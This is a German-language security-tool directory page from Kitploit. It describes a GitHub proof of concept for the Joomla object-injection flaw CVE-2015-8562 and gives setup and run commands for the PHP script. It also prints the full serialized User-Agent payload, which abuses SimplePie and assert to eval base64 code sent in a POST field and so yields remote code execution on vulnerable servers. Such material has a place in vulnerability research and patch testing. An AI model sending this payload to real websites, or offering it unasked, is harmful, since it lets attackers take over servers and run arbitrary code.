Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Joomla-CVE-2015-8562-PHP-POC — Ein Proof-of-Concept für die Joomla-Sicherheitslücke CVE-2015-8562 | Kitploit
Tools/GitHubGitHub/robinhoutevelts/joomla-cve-2015-8562-php-poc
SchwachstellenanalyseCode-AnalyseExploitationWebanwendungs-ExploitationPenetrationstestsPayload-Entwicklung
GitHubrobinhoutevelts/joomla-cve-2015-8562-php-poc

Joomla-CVE-2015-8562-PHP-POC

Ein Proof-of-Concept für die Joomla-Sicherheitslücke CVE-2015-8562

Repository anzeigen
23vor 10 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Joomla-CVE-2015-8562-PHP-POC

Ein Proof of Concept für die Schwachstelle CVE-2015-8562 in Joomla

Preview

Einleitung

Dieser PoC ist eine nahezu 1:1-Kopie von Garys Python-Implementierung, gehostet auf exploit-db.

Verwendung

Die Installation ist sehr einfach:

root@kitploit:~
git clone https://github.com/RobinHoutevelts/Joomla-CVE-2015-8562-PHP-POC.git
cd Joomla-CVE-2015-8562-PHP-POC
composer install

Sobald Composer alles installiert hat, müssen Sie $target in exploit.php ändern.

Danach sind Sie bereit:

root@kitploit:~
php exploit.php

CVE-2015-8562

Im Dezember 2015 wurde eine Schwachstelle in Joomla gefunden. Sie ermöglicht es entfernten Angreifern, PHP-Objekt-Injection-Angriffe durchzuführen und beliebigen PHP-Code über den HTTP-User-Agent-Header auszuführen.

Diese Schwachstelle betrifft alle Versionen von Joomla. Ein Patch für v1.5.x, v2.5x und v3.x ist bereits veröffentlicht.

Wenn Sie PHP >= 5.4.45, >= 5.5.29 oder >= 5.6.13 ausführen, sind Sie sicher, da dieser Exploit auch CVE-2015-6835 verwendet.

Nikos Verschore von PatrolServer hat einen sehr detaillierten Blogbeitrag verfasst und war eine große Hilfe beim Verständnis dieser Schwachstelle. Sie können ihren Mini-Scanner kostenlos nutzen, um zu überprüfen, ob Ihre Website gefährdet ist.

Der eigentliche Exploit

So sieht der gesendete User-Agent-Header aus:

root@kitploit:~
jklmj}__jklmjklmjk|O:21:"JDatabaseDriverMysqli":3:{
  s:4:"\0\0\0a";
  O:17:"JSimplepieFactory":0:{}
  s:21:"\0\0\0disconnectHandlers";
  a:1:{
    i:0;
    a:2:{
      i:0;
      O:9:"SimplePie":5:{
        s:8:"sanitize";
        O:20:"JDatabaseDriverMysql":0:{}
        s:5:"cache";
        b:1;
        s:19:"cache_name_function";
        s:6:"assert";
        s:10:"javascript";
        i:9999;
        s:8:"feed_url";
        s:62:"eval('base64_decode($_POST[111])');JFactory::getConfig();exit;";
      }
      i:1;
      s:4:"init";
    }
  }
  s:13:"\0\0\0connection";
  i:1;
}
Tool herunterladen